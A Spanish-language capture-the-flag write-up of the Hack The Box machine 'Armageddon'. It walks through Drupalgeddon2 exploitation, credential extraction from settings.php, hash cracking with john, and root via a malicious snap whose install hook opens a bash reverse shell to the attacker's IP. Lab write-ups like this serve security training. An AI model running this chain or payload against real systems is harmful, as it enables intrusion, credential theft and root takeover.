# Armageddon

**OS**: Linux \
**Dificultad**: Fácil \
**Puntos**: 20

## Resumen
- Drupal 7 (Drupalgeddon2)
- Crack hash MySQL
- Snap (sudo priv esc)

## Nmap Scan

`nmap -sV -sC -oN nmap.txt -p- 10.10.10.233`

```
Nmap scan report for 10.10.10.233
Host is up (0.075s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA)
|   256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA)
|_  256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16
|_http-title: Welcome to  Armageddon |  Armageddon
```

## Enumeración

Podemos ver que nmap nos muestra un par de puertos abiertos y la aplicación que está en el puerto 80 es un **Drupal 7**. Mirando el **CHANGELOG.txt** vemos exactamente la versión.

`http://10.10.10.233/CHANGELOG.txt`

![1](img/1.png)

Ya que es una versión antigua de Drupal buscamos exploits públicos y existen varios scripts que nos pueden ayudar.

`searchsploit Drupal 7`

![2](img/2.png)

### Drupalgeddon2

Utilizaremos el script del siguiente [repositorio](https://github.com/dreadlocked/Drupalgeddon2) para obtener una shell.

> Necesitamos instalar el el modulo highline de ruby: \
    gem install highline

`ruby drupalgeddon2.rb http://10.10.10.233/`

![3](img/3.png)

## Escalada de Privilegios (User)

Revisando las configuraciones de Drupal obtenemos las credenciales de la base de datos.

`cat /var/www/html/sites/default/settings.php`

![4](img/4.png)

```
database => drupal
username => drupaluser
password => CQHEy@9M*m23gBVj
```

Con las credenciales hacemos consultas a la base de datos y conseguimos el hash del usuario **brucetherealadmin**.

`mysql -D drupal -u drupaluser -pCQHEy@9M*m23gBVj -e 'SELECT name,pass FROM users'`

![5](img/5.png)

Utilizando **john** podemos descifrar el hash para obtener el password en texto plano.

`john hash.txt -wordlist=/usr/share/wordlists/rockyou.txt`

![6](img/6.png)

```
brucetherealadmin : booboo
```

Ahora es posible conectarse por SSH.

`ssh brucetherealadmin@10.10.10.233`

![7](img/7.png)

## Escalada de Privilegios (Root)

Podemos ver que el usuario puede ejecutar el comando **/usr/bin/snap install** como sudo.

![8](img/8.png)

Investigando, esto nos permitirá instalar un paquete **snap** malicioso para obtener una reverse shell.

> Es necesario instalar fpm en nuestra máquina: \
    gem install --no-document fpm

Creamos nuestro paquete snap con el siguiente script.

##### make_snap.sh
```sh
#!/bin/bash

COMMAND='bash -i >& /dev/tcp/10.10.14.33/1234 0>&1'
mkdir -p meta/hooks
printf '#!/bin/bash\n%s' "$COMMAND" > meta/hooks/install
chmod +x meta/hooks/install
fpm -n doom -s dir -t snap -a all meta
```

`sh ./make_snap.sh`

![9](img/9.png)

Ahora enviamos nuestro archivo a la máquina víctima.

- `python3 -m http.server 80`
- `curl http://10.10.14.33/doom_1.0_all.snap -o doom_1.0_all.snap`

![10](img/10.png)

Una vez descargado el archivo podemos instalarlo con el comando sudo para obtener una reverse shell como root.

- `nc -lvnp 1234`
- `sudo /usr/bin/snap install --devmode doom_1.0_all.snap`

![11](img/11.png)

## Referencias
https://github.com/dreadlocked/Drupalgeddon2 \
https://fpm.readthedocs.io/en/latest/installing.html \
https://gtfobins.github.io/gtfobins/snap/